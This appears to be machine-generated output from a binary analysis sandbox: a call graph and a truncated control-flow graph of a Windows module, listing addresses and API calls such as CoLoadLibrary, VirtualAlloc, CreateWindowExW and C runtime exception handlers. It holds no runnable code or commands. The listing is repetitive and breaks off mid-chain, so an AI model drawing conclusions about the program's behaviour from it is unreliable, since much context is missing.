7fef7525105 14061->14062 14063 7fef75214d0 63 API calls 14062->14063 14064 7fef752510d 14063->14064 14065 7fef7521628 63 API calls 14064->14065 14066 7fef752511c 14065->14066 14067 7fef7521848 63 API calls 14066->14067 14068 7fef7525129 14067->14068 14069 7fef75214d0 63 API calls 14068->14069 14070 7fef7525131 14069->14070 14071 7fef7521628 63 API calls 14070->14071 14072 7fef7525140 14071->14072 14073 7fef7521848 63 API calls 14072->14073 14074 7fef752514d 14073->14074 14075 7fef75214d0 63 API calls 14074->14075 14076 7fef7525155 14075->14076 14077 7fef7521628 63 API calls 14076->14077 14078 7fef7525164 14077->14078 14079 7fef7521848 63 API calls 14078->14079 14080 7fef7525171 14079->14080 14081 7fef75214d0 63 API calls 14080->14081 14082 7fef7525179 14081->14082 14083 7fef7521628 63 API calls 14082->14083 14084 7fef7525188 14083->14084 14085 7fef7521848 63 API calls 14084->14085 14086 7fef7525195 14085->14086 14087 7fef75214d0 63 API calls 14086->14087 14088 7fef752519d 14087->14088 14089 7fef7521628 63 API calls 14088->14089 14090 7fef75251ac 14089->14090 14091 7fef7521848 63 API calls 14090->14091 14092 7fef75251b9 14091->14092 14093 7fef75214d0 63 API calls 14092->14093 14094 7fef75251c1 14093->14094 14095 7fef7521628 63 API calls 14094->14095 14096 7fef75251d0 14095->14096 14097 7fef7521848 63 API calls 14096->14097 14098 7fef75251dd 14097->14098 14099 7fef75214d0 63 API calls 14098->14099 14100 7fef75251e5 14099->14100 14101 7fef7521628 63 API calls 14100->14101 14102 7fef75251f4 14101->14102 14103 7fef7521848 63 API calls 14102->14103 14104 7fef7525201 14103->14104 14105 7fef75214d0 63 API calls 14104->14105 14106 7fef7525209 14105->14106 14107 7fef7521628 63 API calls 14106->14107 14108 7fef7525218 14107->14108 14109 7fef7521848 63 API calls 14108->14109 14110 7fef7525225 14109->14110 14111 7fef75214d0 63 API calls 14110->14111 14112 7fef752522d 14111->14112 14113 7fef7521628 63 API calls 14112->14113 14114 7fef752523c 14113->14114 14115 7fef7521848 63 API calls 14114->14115 14116 7fef7525249 14115->14116 14117 7fef75214d0 63 API calls 14116->14117 14118 7fef7525251 14117->14118 14119 7fef7521628 63 API calls 14118->14119 14120 7fef7525260 14119->14120 14121 7fef7521848 63 API calls 14120->14121 14122 7fef752526d 14121->14122 14123 7fef75214d0 63 API calls 14122->14123 14124 7fef7525275 14123->14124 14125 7fef7521628 63 API calls 14124->14125 14126 7fef7525284 14125->14126 14127 7fef7521848 63 API calls 14126->14127 14128 7fef7525291 14127->14128 14129 7fef75214d0 63 API calls 14128->14129 14130 7fef7525299 14129->14130 14131 7fef7521628 63 API calls 14130->14131 14132 7fef75252a8 14131->14132 14133 7fef7521848 63 API calls 14132->14133 14134 7fef75252b5 14133->14134 14135 7fef75214d0 63 API calls 14134->14135 14136 7fef75252bd 14135->14136 14137 7fef7521628 63 API calls 14136->14137 14138 7fef75252cc 14137->14138 14139 7fef7521848 63 API calls 14138->14139 14140 7fef75252d9 14139->14140 14141 7fef75214d0 63 API calls 14140->14141 14142 7fef75252e1 14141->14142 14143 7fef7521628 63 API calls 14142->14143 14144 7fef75252f0 14143->14144 14145 7fef7521848 63 API calls 14144->14145 14146 7fef75252fd 14145->14146 14147 7fef75214d0 63 API calls 14146->14147 14148 7fef7525305 14147->14148 14149 7fef7521628 63 API calls 14148->14149 14150 7fef7525314 14149->14150 14151 7fef7521848 63 API calls 14150->14151 14152 7fef7525321 14151->14152 14153 7fef75214d0 63 API calls 14152->14153 14154 7fef7525329 14153->14154 14155 7fef7521628 63 API calls 14154->14155 14156 7fef7525338 14155->14156 14157 7fef7521848 63 API calls 14156->14157 14158 7fef7525345 14157->14158 14159 7fef75214d0 63 API calls 14158->14159 14160 7fef752534d 14159->14160 14161 7fef7521628 63 API calls 14160->14161 14162 7fef752535c 14161->14162 14163 7fef7521848 63 API calls 14162->14163 14164 7fef7525369 14163->14164 14165 7fef75214d0 63 API calls 14164->14165 14166 7fef7525371 14165->14166 14167 7fef7521628 63 API calls 14166->14167 14168 7fef7525380 14167->14168 14169 7fef7521848 63 API calls 14168->14169 14170 7fef752538d 14169->14170 14171 7fef75214d0 63 API calls 14170->14171 14172 7fef7525395 14171->14172 14173 7fef7521628 63 API calls 14172->14173 14174 7fef75253a4 14173->14174 14175 7fef7521848 63 API calls 14174->14175 14176 7fef75253b1 14175->14176 14177 7fef75214d0 63 API calls 14176->14177 14178 7fef75253b9 14177->14178 14179 7fef7521628 63 API calls 14178->14179 14180 7fef75253c8 14179->14180 14181 7fef7521848 63 API calls 14180->14181 14182 7fef75253d5 14181->14182 14183 7fef75214d0 63 API calls 14182->14183 14184 7fef75253dd 14183->14184 14185 7fef7521628 63 API calls 14184->14185 14186 7fef75253ec 14185->14186 14187 7fef7521848 63 API calls 14186->14187 14188 7fef75253f9 14187->14188 14189 7fef75214d0 63 API calls 14188->14189 14190 7fef7525401 14189->14190 14191 7fef7521628 63 API calls 14190->14191 14192 7fef7525410 14191->14192 14193 7fef7521848 63 API calls 14192->14193 14194 7fef752541d 14193->14194 14195 7fef75214d0 63 API calls 14194->14195 14196 7fef7525425 14195->14196 14197 7fef7521628 63 API calls 14196->14197 14198 7fef7525434 14197->14198 14199 7fef7521848 63 API calls 14198->14199 14200 7fef7525441 14199->14200 14201 7fef75214d0 63 API calls 14200->14201 14202 7fef7525449 14201->14202 14203 7fef7521628 63 API calls 14202->14203 14204 7fef7525458 14203->14204 14205 7fef7521848 63 API calls 14204->14205 14206 7fef7525465 14205->14206 14207 7fef75214d0 63 API calls 14206->14207 14208 7fef752546d CoLoadLibrary 14207->14208 14209 7fef7525485 LoadStringW LoadStringW 14208->14209 14210 7fef752552c VirtualAlloc RtlAllocateHeap 14208->14210 15079 7fef7521444 LoadIconW LoadCursorW LoadIconW RegisterClassExW 14209->15079 14212 7fef7525561 memcpy_s 14210->14212 14218 7fef7525577 memcpy_s 14210->14218 14215 7fef752556e CoTaskMemFree 14212->14215 14213 7fef75254b9 15080 7fef75210f4 CreateWindowExW 14213->15080 14215->14218 14216 7fef75255cd RtlAllocateHeap 14216->14218 14217 7fef75254c5 14217->12915 14219 7fef75254cd LoadAcceleratorsW 14217->14219 14218->12915 14218->14216 14221 7fef75255f0 CoTaskMemFree 14218->14221 14220 7fef752550b GetMessageW 14219->14220 14222 7fef75254de TranslateAcceleratorW 14220->14222 14223 7fef7525522 ExitProcess 14220->14223 14221->14218 14222->14220 14224 7fef75254f5 TranslateMessage DispatchMessageW 14222->14224 14224->14220 14226 7fef7528e23 14225->14226 14227 7fef752eab8 GetVersion 14225->14227 14226->12892 14230 7fef752db58 14226->14230 14228 7fef752eac2 HeapSetInformation 14227->14228 14229 7fef752eadc 14227->14229 14228->14229 14229->14226 14348 7fef752deb4 14230->14348 14308 7fef752c489 14307->14308 14310 7fef7528f05 14308->14310 14311 7fef752c4a7 Sleep 14308->14311 15018 7fef7531c58 14308->15018 14310->12890 14310->12892 14311->14308 14311->14310 14326->12881 14328 7fef752fd8c _lock 62 API calls 14327->14328 14329 7fef752d8dd 14328->14329 15026 7fef752fc8c LeaveCriticalSection 14329->15026 14337 7fef752ab39 HeapFree 14336->14337 14341 7fef752ab69 free 14336->14341 14338 7fef752ab54 14337->14338 14337->14341 14339 7fef752f5c0 _errno 60 API calls 14338->14339 14340 7fef752ab59 GetLastError 14339->14340 14340->14341 14341->12892 14343 7fef752db50 14342->14343 14344 7fef752db2c 14342->14344 14343->12892 14345 7fef752db31 FlsGetValue 14344->14345 14346 7fef752db40 FlsSetValue 14344->14346 14345->14346 15027 7fef752d9e4 14346->15027 14356 7fef752d84c EncodePointer 14348->14356 15019 7fef7531c6d 15018->15019 15025 7fef7531c8a 15018->15025 15020 7fef7531c7b 15019->15020 15019->15025 15022 7fef752f5c0 _errno 61 API calls 15020->15022 15021 7fef7531ca2 RtlAllocateHeap 15024 7fef7531c80 15021->15024 15021->15025 15022->15024 15023 7fef752f25c _callnewh DecodePointer 15023->15025 15024->14308 15025->15021 15025->15023 15025->15024 15028 7fef752db0c 15027->15028 15029 7fef752d9ed 15027->15029 15028->14343 15030 7fef752da08 15029->15030 15031 7fef752ab34 free 62 API calls 15029->15031 15032 7fef752da16 15030->15032 15033 7fef752ab34 free 62 API calls 15030->15033 15031->15030 15034 7fef752da24 15032->15034 15035 7fef752ab34 free 62 API calls 15032->15035 15033->15032 15036 7fef752da32 15034->15036 15037 7fef752ab34 free 62 API calls 15034->15037 15035->15034 15038 7fef752da40 15036->15038 15039 7fef752ab34 free 62 API calls 15036->15039 15037->15036 15040 7fef752da4e 15038->15040 15041 7fef752ab34 free 62 API calls 15038->15041 15039->15038 15042 7fef752da5f 15040->15042 15044 7fef752ab34 free 62 API calls 15040->15044 15041->15040 15043 7fef752da77 15042->15043 15045 7fef752ab34 free 62 API calls 15042->15045 15046 7fef752fd8c _lock 62 API calls 15043->15046 15044->15042 15045->15043 15049 7fef752da83 15046->15049 15047 7fef752dab0 15059 7fef752fc8c LeaveCriticalSection 15047->15059 15049->15047 15051 7fef752ab34 free 62 API calls 15049->15051 15051->15047 15061 7fef752167c 15060->15061 15083 7fef7521540 15061->15083 15063 7fef75217ff 15066 7fef7521813 15063->15066 15103 7fef75215b8 15063->15103 15068 7fef7521848 15066->15068 15069 7fef7521540 63 API calls 15068->15069 15070 7fef7521878 15069->15070 15071 7fef75211e0 63 API calls 15070->15071 15072 7fef7521924 15070->15072 15071->15072 15073 7fef7521938 15072->15073 15074 7fef75215b8 63 API calls 15072->15074 15075 7fef75214d0 15073->15075 15074->15073 15076 7fef75214f5 15075->15076 15077 7fef752152d 15076->15077 15078 7fef75211e0 63 API calls 15076->15078 15077->12925 15078->15077 15079->14213 15081 7fef752116f 15080->15081 15082 7fef7521156 ShowWindow UpdateWindow 15080->15082 15081->14217 15082->15081 15084 7fef7521572 15083->15084 15085 7fef7521596 15084->15085 15086 7fef75214d0 63 API calls 15084->15086 15085->15063 15087 7fef75211e0 15085->15087 15086->15085 15088 7fef75211fa 15087->15088 15102 7fef75212e9 15087->15102 15091 7fef7521208 15088->15091 15107 7fef7528540 15088->15107 15090 7fef7521259 15092 7fef75212a3 15090->15092 15094 7fef75283a0 std::exception::exception 62 API calls 15090->15094 15091->15090 15110 7fef75283a0 15091->15110 15095 7fef75283a0 std::exception::exception 62 API calls 15092->15095 15098 7fef752127f 15094->15098 15099 7fef75212c5 15095->15099 15097 7fef7528540 std::_Facet_Register RaiseException 15097->15090 15100 7fef7528540 std::_Facet_Register RaiseException 15098->15100 15101 7fef7528540 std::_Facet_Register RaiseException 15099->15101 15100->15092 15101->15102 15102->15063 15104 7fef75215d3 15103->15104 15105 7fef75215d8 15103->15105 15106 7fef75214d0 63 API calls 15104->15106 15105->15066 15106->15105 15108 7fef752856e memcpy_s 15107->15108 15109 7fef75285ad RaiseException 15108->15109 15109->15091 15113 7fef752831c 15110->15113 15114 7fef7528321 std::exception::operator= 15113->15114 15117 7fef7521235 15113->15117 15115 7fef752d328 malloc 62 API calls 15114->15115 15116 7fef752834a 15115->15116 15116->15117 15118 7fef752d43c std::exception::operator= 62 API calls 15116->15118 15117->15097 15118->15117 15965 7fef752b42c 15966 7fef752b464 15965->15966 15967 7fef752b49a 15966->15967 15969 7fef7528890 15966->15969 15970 7fef752d9c0 _getptd 62 API calls 15969->15970 15971 7fef75288b2 15970->15971 15972 7fef752d9c0 _getptd 62 API calls 15971->15972 15973 7fef75288c2 15972->15973 15974 7fef752d9c0 _getptd 62 API calls 15973->15974 15975 7fef75288d2 15974->15975 15978 7fef752a90c 15975->15978 15979 7fef752d9c0 _getptd 62 API calls 15978->15979 15980 7fef752a935 15979->15980 15981 7fef752a9a0 15980->15981 15983 7fef752aa33 15980->15983 15997 7fef7528907 15980->15997 15982 7fef752a9fc 15981->15982 15985 7fef752a9c2 15981->15985 15981->15997 15987 7fef752aa20 15982->15987 15994 7fef752aa05 15982->15994 15988 7fef752aa53 15983->15988 15983->15997 16036 7fef752877c 15983->16036 16000 7fef752d71c 15985->16000 16027 7fef75287e4 15987->16027 15993 7fef752aa8d 15988->15993 15988->15997 16039 7fef7528794 15988->16039 15993->15997 16042 7fef752a418 15993->16042 15995 7fef752a9e6 15994->15995 15996 7fef752de00 __CxxFrameHandler 65 API calls 15994->15996 16010 7fef7529970 15995->16010 15996->15995 15997->15967 16001 7fef752d73e 16000->16001 16002 7fef752d743 16000->16002 16003 7fef752de00 __CxxFrameHandler 65 API calls 16001->16003 16004 7fef752de00 __CxxFrameHandler 65 API calls 16002->16004 16005 7fef752a9d5 16002->16005 16003->16002 16004->16005 16005->15995 16006 7fef752de00 DecodePointer 16005->16006 16007 7fef752de16 16006->16007 16008 7fef752dddc __CxxFrameHandler 64 API calls 16007->16008 16009 7fef752de1f 16008->16009 16009->15995 16114 7fef752d7b0 16010->16114 16013 7fef752877c __CxxFrameHandler 62 API calls 16014 7fef75299aa 16013->16014 16015 7fef752d9c0 _getptd 62 API calls 16014->16015 16019 7fef75299b4 __CxxFrameHandler 16015->16019 16016 7fef7529ab0 16017 7fef752d9c0 _getptd 62 API calls 16016->16017 16018 7fef7529ab5 16017->16018 16021 7fef7529ac3 16018->16021 16022 7fef752d9c0 _getptd 62 API calls 16018->16022 16019->16016 16020 7fef752de00 __CxxFrameHandler 65 API calls 16019->16020 16025 7fef752877c 62 API calls __CxxFrameHandler 16019->16025 16118 7fef75287ac 16019->16118 16020->16019 16023 7fef752de00 __CxxFrameHandler 65 API calls 16021->16023 16024 7fef7529ad8 __CxxFrameHandler 16021->16024 16022->16021 16023->16024 16024->15997 16025->16019 16121 7fef7528690 16027->16121 16031 7fef7528819 16032 7fef7528857 16031->16032 16033 7fef752d9c0 _getptd 62 API calls 16031->16033 16034 7fef7529970 __CxxFrameHandler 65 API calls 16032->16034 16033->16031 16035 7fef7528876 16034->16035 16035->15997 16037 7fef752d9c0 _getptd 62 API calls 16036->16037 16038 7fef7528785 16037->16038 16038->15988 16040 7fef752d9c0 _getptd 62 API calls 16039->16040 16041 7fef752879d 16040->16041 16041->15993 16043 7fef752d7a8 __GetUnwindTryBlock 65 API calls 16042->16043 16044 7fef752a45f 16043->16044 16045 7fef7528690 __GetUnwindTryBlock 66 API calls 16044->16045 16046 7fef752a473 16045->16046 16132 7fef752d820 16046->16132 16049 7fef752a48b __CxxFrameHandler 16135 7fef752d7e4 16049->16135 16050 7fef752a4aa 16051 7fef752d820 __GetUnwindTryBlock 66 API calls 16050->16051 16052 7fef752a4a8 16051->16052 16054 7fef752de00 __CxxFrameHandler 65 API calls 16052->16054 16060 7fef752a4c3 16052->16060 16054->16060 16055 7fef752a8a7 16056 7fef752a878 16055->16056 16057 7fef752a8df 16055->16057 16058 7fef752a8b3 16055->16058 16061 7fef752d9c0 _getptd 62 API calls 16056->16061 16063 7fef752dddc __CxxFrameHandler 64 API calls 16057->16063 16183 7fef752a1e0 16058->16183 16059 7fef752a665 16059->16055 16067 7fef752a69f 16059->16067 16060->16055 16060->16059 16068 7fef752d9c0 _getptd 62 API calls 16060->16068 16064 7fef752a87d 16061->16064 16066 7fef752a8e4 16063->16066 16065 7fef752a88c 16064->16065 16069 7fef752de00 __CxxFrameHandler 65 API calls 16064->16069 16065->15997 16070 7fef752848c std::exception::exception 62 API calls 16066->16070 16071 7fef752a7e3 16067->16071 16151 7fef7528a10 16067->16151 16072 7fef752a508 16068->16072 16069->16065 16073 7fef752a8f6 16070->16073 16071->16056 16077 7fef752877c __CxxFrameHandler 62 API calls 16071->16077 16079 7fef752a809 16071->16079 16072->16065 16075 7fef752d9c0 _getptd 62 API calls 16072->16075 16073->15997 16076 7fef752a51b 16075->16076 16078 7fef752d9c0 _getptd 62 API calls 16076->16078 16077->16079 16081 7fef752a527 16078->16081 16079->16056 16080 7fef752a81e 16079->16080 16082 7fef752877c __CxxFrameHandler 62 API calls 16079->16082 16085 7fef7529b80 __CxxFrameHandler 65 API calls 16080->16085 16138 7fef75287c8 16081->16138 16082->16080 16084 7fef752877c __CxxFrameHandler 62 API calls 16104 7fef752a6d2 16084->16104 16086 7fef752a834 16085->16086 16086->16056 16088 7fef7528690 __GetUnwindTryBlock 66 API calls 16086->16088 16087 7fef752a53b __CxxFrameHandler 16089 7fef752de00 __CxxFrameHandler 65 API calls 16087->16089 16096 7fef752a551 16087->16096 16090 7fef752a84a 16088->16090 16089->16096 16179 7fef7528c14 16090->16179 16091 7fef752a586 16092 7fef752d9c0 _getptd 62 API calls 16091->16092 16094 7fef752a58b 16092->16094 16094->16059 16098 7fef752d9c0 _getptd 62 API calls 16094->16098 16095 7fef7528794 62 API calls __CxxFrameHandler 16095->16104 16096->16091 16097 7fef752de00 __CxxFrameHandler 65 API calls 16096->16097 16097->16091 16099 7fef752a59e 16098->16099 16100 7fef752d9c0 _getptd 62 API calls 16099->16100 16101 7fef752a5aa 16100->16101 16141 7fef7529b80 16101->16141 16104->16071 16104->16084 16104->16095 16156 7fef75297f8 16104->16156 16170 7fef752a11c 16104->16170 16106 7fef752a622 16107 7fef752dddc __CxxFrameHandler 64 API calls 16106->16107 16108 7fef752a627 __CxxFrameHandler 16107->16108 16110 7fef75283a0 std::exception::exception 62 API calls 16108->16110 16109 7fef752877c 62 API calls __CxxFrameHandler 16111 7fef752a5bd type_info::operator== 16109->16111 16112 7fef752a64a 16110->16112 16111->16059 16111->16106 16111->16108 16111->16109 16113 7fef7528540 std::_Facet_Register RaiseException 16112->16113 16113->16059 16115 7fef75299a3 16114->16115 16116 7fef752d7c7 16114->16116 16115->16013 16117 7fef752d71c __CxxFrameHandler 65 API calls 16116->16117 16117->16115 16119 7fef752d9c0 _getptd 62 API calls 16118->16119 16120 7fef75287ba 16119->16120 16120->16019 16122 7fef752d7a8 __GetUnwindTryBlock 65 API calls 16121->16122 16123 7fef75286c4 16122->16123 16124 7fef75286f9 RtlLookupFunctionEntry 16123->16124 16125 7fef7528746 16123->16125 16124->16123 16126 7fef752d7a8 16125->16126 16127 7fef752d71c 16126->16127 16128 7fef752d743 16127->16128 16129 7fef752de00 __CxxFrameHandler 65 API calls 16127->16129 16130 7fef752d755 16128->16130 16131 7fef752de00 __CxxFrameHandler 65 API calls 16128->16131 16129->16128 16130->16031 16131->16130 16133 7fef7528690 __GetUnwindTryBlock 66 API calls 16132->16133 16134 7fef752a481 16133->16134 16134->16049 16134->16050 16136 7fef7528690 __GetUnwindTryBlock 66 API calls 16135->16136 16137 7fef752d7fe 16136->16137 16137->16052 16139 7fef752d9c0 _getptd 62 API calls 16138->16139 16140 7fef75287d6 16139->16140 16140->16087 16142 7fef7529ba7 16141->16142 16148 7fef7529bb1 16141->16148 16144 7fef752de00 __CxxFrameHandler 65 API calls 16142->16144 16143 7fef7529c33 16143->16111 16146 7fef7529bac 16144->16146 16145 7fef7528794 62 API calls __CxxFrameHandler 16145->16148 16147 7fef752dddc __CxxFrameHandler 64 API calls 16146->16147 16147->16148 16148->16143 16148->16145 16149 7fef752877c __CxxFrameHandler 62 API calls 16148->16149 16150 7fef75297f8 __CxxFrameHandler 62 API calls 16148->16150 16149->16148 16150->16148 16152 7fef752d7a8 __GetUnwindTryBlock 65 API calls 16151->16152 16153 7fef7528a44 16152->16153 16154 7fef752de00 __CxxFrameHandler 65 API calls 16153->16154 16155 7fef7528a4f 16153->16155 16154->16155 16155->16104 16157 7fef7529823 16156->16157 16159 7fef752982b 16156->16159 16158 7fef752877c __CxxFrameHandler 62 API calls 16157->16158 16158->16159 16160 7fef752877c __CxxFrameHandler 62 API calls 16159->16160 16161 7fef752984a 16159->16161 16169 7fef75298a7 type_info::operator== 16159->16169 16160->16161 16162 7fef7529866 16161->16162 16163 7fef752877c __CxxFrameHandler 62 API calls 16161->16163 16161->16169 16164 7fef7528794 __CxxFrameHandler 62 API calls 16162->16164 16163->16162 16165 7fef752987a 16164->16165 16166 7fef7529893 16165->16166 16167 7fef752877c __CxxFrameHandler 62 API calls 16165->16167 16165->16169 16168 7fef7528794 __CxxFrameHandler 62 API calls 16166->16168 16167->16166 16168->16169 16169->16104 16171 7fef7528690 __GetUnwindTryBlock 66 API calls 16170->16171 16172 7fef752a159 16171->16172 16173 7fef752a17f 16172->16173 16200 7fef752a06c 16172->16200 16175 7fef752877c __CxxFrameHandler 62 API calls 16173->16175 16176 7fef752a184 16175->16176 16177 7fef7528c14 __CxxFrameHandler 8 API calls 16176->16177 16178 7fef752a1c4 16177->16178 16178->16104 16180 7fef7528c79 memcpy_s 16179->16180 16181 7fef7528670 _ftelli64 8 API calls 16180->16181 16182 7fef7528cf0 16181->16182 16182->16056 16184 7fef752a211 16183->16184 16185 7fef752a400 16183->16185 16186 7fef752d9c0 _getptd 62 API calls 16184->16186 16185->16056 16187 7fef752a216 16186->16187 16188 7fef752a27c 16187->16188 16190 7fef752d9c0 _getptd 62 API calls 16187->16190 16188->16185 16189 7fef752a28f 16188->16189 16191 7fef752de00 __CxxFrameHandler 65 API calls 16188->16191 16192 7fef7528a10 __CxxFrameHandler 65 API calls 16189->16192 16193 7fef752a234 16190->16193 16191->16189 16198 7fef752a2c4 16192->16198 16221 7fef752d84c EncodePointer 16193->16221 16197 7fef752877c 62 API calls __CxxFrameHandler 16197->16198 16198->16185 16198->16197 16199 7fef752a11c __CxxFrameHandler 66 API calls 16198->16199 16199->16198 16201 7fef752a08a 16200->16201 16209 7fef7529e68 16201->16209 16203 7fef752a09b 16204 7fef752a09f 16203->16204 16205 7fef752a0d9 16203->16205 16207 7fef752a0b1 __AdjustPointer 16204->16207 16208 7fef7528794 __CxxFrameHandler 62 API calls 16204->16208 16206 7fef7528794 __CxxFrameHandler 62 API calls 16205->16206 16205->16207 16206->16207 16207->16173 16208->16207 16210 7fef7529e98 16209->16210 16213 7fef7529ea0 16209->16213 16211 7fef752877c __CxxFrameHandler 62 API calls 16210->16211 16211->16213 16212 7fef7529f27 __AdjustPointer memcpy_s 16212->16203 16213->16212 16214 7fef752877c __CxxFrameHandler 62 API calls 16213->16214 16215 7fef7529ebd 16213->16215 16214->16215 16215->16212 16216 7fef7528794 __CxxFrameHandler 62 API calls 16215->16216 16218 7fef7529f02 __CxxFrameHandler 16215->16218 16219 7fef7529f9f __CxxFrameHandler 16215->16219 16216->16219 16217 7fef752de00 __CxxFrameHandler 65 API calls 16217->16212 16218->16212 16218->16217 16219->16218 16220 7fef7528794 __CxxFrameHandler 62 API calls 16219->16220 16220->16218

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7fef7521964-7fef75219a0 1 7fef7525639 0->1 2 7fef75219a6-7fef7523cfb call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 0->2 4 7fef752563e-7fef752566d call 7fef7528670 1->4 295 7fef7523d00-7fef7525468 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 